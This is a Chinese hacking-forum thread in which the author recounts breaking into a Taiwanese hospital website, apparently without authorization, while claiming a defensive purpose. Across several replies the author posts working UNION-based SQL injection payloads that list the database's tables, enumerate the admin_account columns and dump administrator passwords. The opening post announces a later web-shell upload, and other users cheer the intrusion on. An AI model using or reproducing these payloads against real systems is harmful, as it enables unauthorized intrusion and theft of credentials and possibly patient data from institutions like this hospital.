首页 > 编程源码 > 【技术分享】对台湾医院一次从头日到尾的渗透过程

【技术分享】对台湾医院一次从头日到尾的渗透过程

楼主：千城墨白❤ [3级] · 2020-2-20 · 浏览2198 · 编程源码 · ID:

哈喽，你们好，又是我，千某人

最近找了一家台湾网站练练手，我发帖都是从信息防御角度出发的，请勿用于违法犯罪等途径。

本帖主要讲通过SQL注入经过后台上传文件通过hackbar post方式getshell直接拿下数据库权限的过程☘️
首先没有SQL注入就没有后面的一切，漏洞排行榜上，SQL注入基本都排榜首，接下来我将给你展示怎么从SQL注入到拿下数据库的一次过程
纯手工渗透测试
纯手工渗透测试
纯手工渗透测试
这里建议:工具永远不能代替手工。希望有些走这方面的路的人不要依赖工具，免得背上脚本小子的代号。懂了原理你就会发现用工具是多么low

- 版权声明 - 1、本帖所有言论和图片等纯属网友个人意见，与流星社区立场无关；
2、其他单位或个人使用、转载或引用本帖时必须同时征得该帖子作者千城墨白❤和流星社区的同意；
3、备注原文地址：https://bbs.liuxingw.com/t/23671.html，可忽略第2条；
4、帖子作者需承担一切因本文发表而直接或间接导致的相关责任；
5、如本帖内容或部分内容转载自其它媒体，这并不代表本站赞同其观点和对其真实性负责；
6、如本帖若为资源类，将仅限用于学习和研究目的，您必须在下载后的24个小时之内，从您安装或使用的设备中彻底删除上述内容；
7、如果您喜欢该程序，请支持正版软件，购买注册，可以得到更好的正版服务；
8、如本帖侵犯到任何版权或违法问题，请立即邮件告知我们，我们将及时予以处理。

21条回复 | 最后回复于2020-2-22

千城墨白❤ [3级]

知道库名，当然得向下一步继续探索表
继续构建and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.tables where table_schema=database()，排出来当前所有表
当然我们最关心得是admin表

发布于2020-2-20

回复列表

内容加载中...

说点什么...

千城墨白❤ [3级]

对admin_accout进行爆字段数据，构建语法and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.columns where table_schema=database() and table_name='admin_account'
可以看见输出了以下字段，username和password当然为我们最喜欢得字段名

发布于2020-2-20

回复列表

内容加载中...

说点什么...

彬哥哥QaQ [2级]

快更新(～O～)

发布于2020-2-20

回复列表

内容加载中...

说点什么...

求破解 [1级]

此帖必火。

发布于2020-2-20

回复列表

内容加载中...

说点什么...

千城墨白❤ [3级]

希望如此

发布于2020-2-20

回复列表

内容加载中...

说点什么...

千城墨白❤ [3级]

感谢星币

发布于2020-2-20

回复列表

内容加载中...

说点什么...

千城墨白❤ [3级]

继续构建语法，得到了两个管理员账户和密码
and 1=2 union select 1,group_concat(pass_word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from admin_account